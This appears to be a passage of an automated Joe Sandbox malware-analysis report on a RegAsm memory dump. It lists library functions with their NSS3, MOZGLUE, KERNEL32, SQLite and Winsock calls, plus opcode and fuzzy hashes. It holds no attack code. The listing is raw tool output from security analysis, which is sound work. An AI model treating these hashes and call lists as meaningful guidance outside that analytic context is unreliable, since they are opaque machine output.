Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: e8b7d58d1481a654fc06f30d6eefa79b283f24e6c435ae734987fda56689a80f
Instruction ID: bf5960a7a8c07be70fb1eea00ffce4e9cced068708d4e27f3df568a62fdb38cd
Opcode Fuzzy Hash: e8b7d58d1481a654fc06f30d6eefa79b283f24e6c435ae734987fda56689a80f
Instruction Fuzzy Hash: 211126B1E403095BE7109B65AC40BBF77F8DFA524CF444628EC2996741FB20E96986F2

Function 6C178E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C192E62,?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C), ref: 6C178EA2

Part of subcall function 6C19F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C19F854
Part of subcall function 6C19F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C19F868
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C19F882
Part of subcall function 6C19F820: free.MOZGLUE(04C483FF,?,?), ref: 6C19F889
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C19F8A4
Part of subcall function 6C19F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C19F8AB
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C19F8C9
Part of subcall function 6C19F820: free.MOZGLUE(280F10EC,?,?), ref: 6C19F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C192E62,?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C), ref: 6C178EC3
TlsGetValue.KERNEL32(?,?,?,6C192E62,?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C), ref: 6C178EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C192E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C178EF1
PR_Unlock.NSS3 ref: 6C178F20

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: 7bafbe426eaa7877ba6a45755f9681eb4de31865e6b75924a3a7a16f73a3c9ad
Instruction ID: 21c22c7089b93506381093fadee8f9956aa1f5555b2645875457840ba1630e10
Opcode Fuzzy Hash: 7bafbe426eaa7877ba6a45755f9681eb4de31865e6b75924a3a7a16f73a3c9ad
Instruction Fuzzy Hash: 8F2160709097059FD710AF29D488699BBF0FF48328F41456EEC989BB41DB30E894CBE2

Function 6C17CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C191E10: TlsGetValue.KERNEL32 ref: 6C191E36
Part of subcall function 6C191E10: EnterCriticalSection.KERNEL32(?,?,?,6C16B1EE,2404110F,?,?), ref: 6C191E4B
Part of subcall function 6C191E10: PR_Unlock.NSS3 ref: 6C191E76

free.MOZGLUE(?,6C17D079,00000000,00000001), ref: 6C17CDA5
PK11_FreeSymKey.NSS3(?,6C17D079,00000000,00000001), ref: 6C17CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C17D079,00000000,00000001), ref: 6C17CDCF
DeleteCriticalSection.KERNEL32(?,6C17D079,00000000,00000001), ref: 6C17CDE2
free.MOZGLUE(?), ref: 6C17CDE9

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: fdc59226ce0ea824a2b7334da3f2f74833eae34abcf5e8ceabc67b65bc55fb97
Instruction ID: 5894e88ce99b8c8e5b068acde0c515f8dda3cbdee1e7e756e66a3ec3dcd82d49
Opcode Fuzzy Hash: fdc59226ce0ea824a2b7334da3f2f74833eae34abcf5e8ceabc67b65bc55fb97
Instruction Fuzzy Hash: A011C2B2B01115ABDB10AFA5ED44A9AB77CFF14668B104131E91987E01E732E474C7E1

Function 6C1B3D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C1B38A2), ref: 6C1B3DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C1B38A2), ref: 6C1B3DBF

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C1B38A2), ref: 6C1B3DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C1B38A2), ref: 6C1B3DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C1B38A2), ref: 6C1B3DF8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: df4fc0a389af765663e75597818adc905e28dc2d44eccf7951dea0f48b3b46a8
Instruction ID: cbfa24ed5667e6c45c98c8bd4a68260f3b3912f5e70403d905fe8ee1c6309d6f
Opcode Fuzzy Hash: df4fc0a389af765663e75597818adc905e28dc2d44eccf7951dea0f48b3b46a8
Instruction Fuzzy Hash: BF01F7B57051113BFB1065B56C4AE3B796CDB41AA8B540235FD14EA5C0ED31CC1185F1

Function 6C1E2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C1E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C1E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1E2CEC

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C1E2D02
PR_EnterMonitor.NSS3(?), ref: 6C1E2D1F
PR_ExitMonitor.NSS3(?), ref: 6C1E2D42
PR_ExitMonitor.NSS3(?), ref: 6C1E2D5B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 337556e06860fd5908fb4790ef81025ad737cc962595d8839bb4562ec949557d
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 3B01A5B19046055FE6309F26FC50BC7B7A1FB59318F004525EA5DC6B10E632E8258A92

Function 6C1E2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C1E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C1E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1E2D9C

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C1E2DB2
PR_EnterMonitor.NSS3(?), ref: 6C1E2DCF
PR_ExitMonitor.NSS3(?), ref: 6C1E2DF2
PR_ExitMonitor.NSS3(?), ref: 6C1E2E0B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 3f52ac6d0ff2be0e032bc879ffc7270a9b137983324b0dd6780e5a52dc4f863d
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 7001A5B1904A055FE6309F25FC11BC7B7E1EB55318F000535EA5DC6B10D632E8258692

Function 6C17AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C163090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C17AE42), ref: 6C1630AA
Part of subcall function 6C163090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1630C7
Part of subcall function 6C163090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C1630E5
Part of subcall function 6C163090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C163116
Part of subcall function 6C163090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C16312B
Part of subcall function 6C163090: PK11_DestroyObject.NSS3(?,?), ref: 6C163154
Part of subcall function 6C163090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C1599FF,?,?,?,?,?,?,?,?,?,6C152D6B,?), ref: 6C17AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C1599FF,?,?,?,?,?,?,?,?,?,6C152D6B,?), ref: 6C17AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C152D6B,?,?,00000000), ref: 6C17AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C152D6B,?,?,00000000), ref: 6C17AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C152D6B,?,?), ref: 6C17AEA3

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: cbb87b138cfef54fc67fa6db1f3e9640d216f13900743374c8d20a2f25abe495
Instruction ID: 9be741852188c0417ea816a00ed7392f2bd92d0d1532da0e379429d4d3a76edc
Opcode Fuzzy Hash: cbb87b138cfef54fc67fa6db1f3e9640d216f13900743374c8d20a2f25abe495
Instruction Fuzzy Hash: 3E01F467B0401057E721926CAC95BAF31588B9765CF091032E809D7B41FE1AC91943F3

Function 6C267C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C267C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C267C83
malloc.MOZGLUE(00000001), ref: 6C267C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C267C9F
PR_GetCurrentThread.NSS3 ref: 6C267CAD

Part of subcall function 6C219BF0: TlsGetValue.KERNEL32(?,?,?,6C260A75), ref: 6C219C07

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 6b6e59b7e62d2006a5534e78439f6e92324af70c2ee47494fcd9dcfa485deddf
Instruction ID: a34b166a3bf66048b1fe292588ed8486172753b157401b09e413ead30d8ea1b8
Opcode Fuzzy Hash: 6b6e59b7e62d2006a5534e78439f6e92324af70c2ee47494fcd9dcfa485deddf
Instruction Fuzzy Hash: 72F0C2B192020A6FEB00AF7BAC0995B7B98EF00369B118435EC09C7F00EB31E114CAE5

Function 6C26ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C26A6D8), ref: 6C26AE0D
free.MOZGLUE(?), ref: 6C26AE14
DeleteCriticalSection.KERNEL32(6C26A6D8), ref: 6C26AE36
free.MOZGLUE(?), ref: 6C26AE3D
free.MOZGLUE(00000000,00000000,?,?,6C26A6D8), ref: 6C26AE47

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: c0096dfa0efe58bb9bec229c4867538039621a52e0a8db42ac5664c92a2135c4
Instruction ID: 26a08439736e50e5ea3b21efe76e7b27911aa49e74b937ac4db562395e4bf493
Opcode Fuzzy Hash: c0096dfa0efe58bb9bec229c4867538039621a52e0a8db42ac5664c92a2135c4
Instruction Fuzzy Hash: EBF0F675201A06A7CB009FE9E80CA1BB7B8BF86B75B100328F92A83981D733E011C7D1

Function 6C0EBCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6C28AAF9,?), ref: 6C0EBE37

Strings

P&l, xrefs: 6C0EBED4
winFileSize, xrefs: 6C0EBF07
&l, xrefs: 6C0EBDD7

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: &l$P&l$winFileSize
API String ID: 4246442610-618154792
Opcode ID: 909706506ff65a949329a56a3c910997373a8462c4ee05cbd40cbc1fcc9f77c3
Instruction ID: 56e22ce5711575a1403bbe40afb9f54a1f0abe9fbbb71f1b557832ac7e4f160c
Opcode Fuzzy Hash: 909706506ff65a949329a56a3c910997373a8462c4ee05cbd40cbc1fcc9f77c3
Instruction Fuzzy Hash: F5619D31A48705EFDF04CF68C4907A9B7F1BF8A314B5446A5D8159BB80EB30E856CBD5

Function 6C0F7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0F7D35

Strings

%s at line %d of [%.10s], xrefs: 6C0F7D2E
database corruption, xrefs: 6C0F7D29
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0F7D13, 6C0F7D1F, 6C0F7D47, 6C0F7D53, 6C0F7D5F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: d418bf7c79ac323c502403e6b6dd4f5d1ef219c2ab3e639961a43a685815eabc
Instruction ID: f386b87eec010faabd730538a55b30c7c7dd648c0c1ed56b1b487b7711e36e2a
Opcode Fuzzy Hash: d418bf7c79ac323c502403e6b6dd4f5d1ef219c2ab3e639961a43a685815eabc
Instruction Fuzzy Hash: 78312D71E0422957CB10CF5EC840ABDB7F1EF48709B9901A9EC58B7782D671D882C7B1

Function 6C0E6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C0E6D36

Strings

%s at line %d of [%.10s], xrefs: 6C0E6D2F
database corruption, xrefs: 6C0E6D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0E6D20

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 9a789041f7e2c85729ba5987aacea10b84ae409a3276ac69c7bc01689ad4cc00
Instruction ID: c968dd391a4e6e31035d858b62de862a8ba9849ec40111eef77be92f2c35d053
Opcode Fuzzy Hash: 9a789041f7e2c85729ba5987aacea10b84ae409a3276ac69c7bc01689ad4cc00
Instruction Fuzzy Hash: F0212730A483089FCB10CE19E841B5AB7F2AF48318F94852CD9499BF51E770F9488791

Function 6C21CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C21CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C21CC7B), ref: 6C21CD7A
Part of subcall function 6C21CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C21CD8E
Part of subcall function 6C21CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C21CDA5
Part of subcall function 6C21CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C21CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C21CCB5
memcpy.VCRUNTIME140(6C2B14F4,6C2B02AC,00000090), ref: 6C21CCD3
memcpy.VCRUNTIME140(6C2B1588,6C2B02AC,00000090), ref: 6C21CD2B

Part of subcall function 6C139AC0: socket.WSOCK32(?,00000017,6C1399BE), ref: 6C139AE6
Part of subcall function 6C139AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C1399BE), ref: 6C139AFC

Part of subcall function 6C140590: closesocket.WSOCK32(6C139A8F,?,?,6C139A8F,00000000), ref: 6C140597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C21CCB0

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: ebcd8e82b7d0162515e36f599b7a8f07c4af2018a436e5a3a489eb928ac20501
Instruction ID: 0f50e539e9debe4ca603e9c355dc144f3fe0c9185ea09377b952e4b32d7d6130
Opcode Fuzzy Hash: ebcd8e82b7d0162515e36f599b7a8f07c4af2018a436e5a3a489eb928ac20501
Instruction Fuzzy Hash: 131175F5A042485FDB009F5A8A4A782B6B8934665CF141035ED099BFC1E671D4C4C7E9

Function 6C1C1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C1C1D8F

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C1C1DA6

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
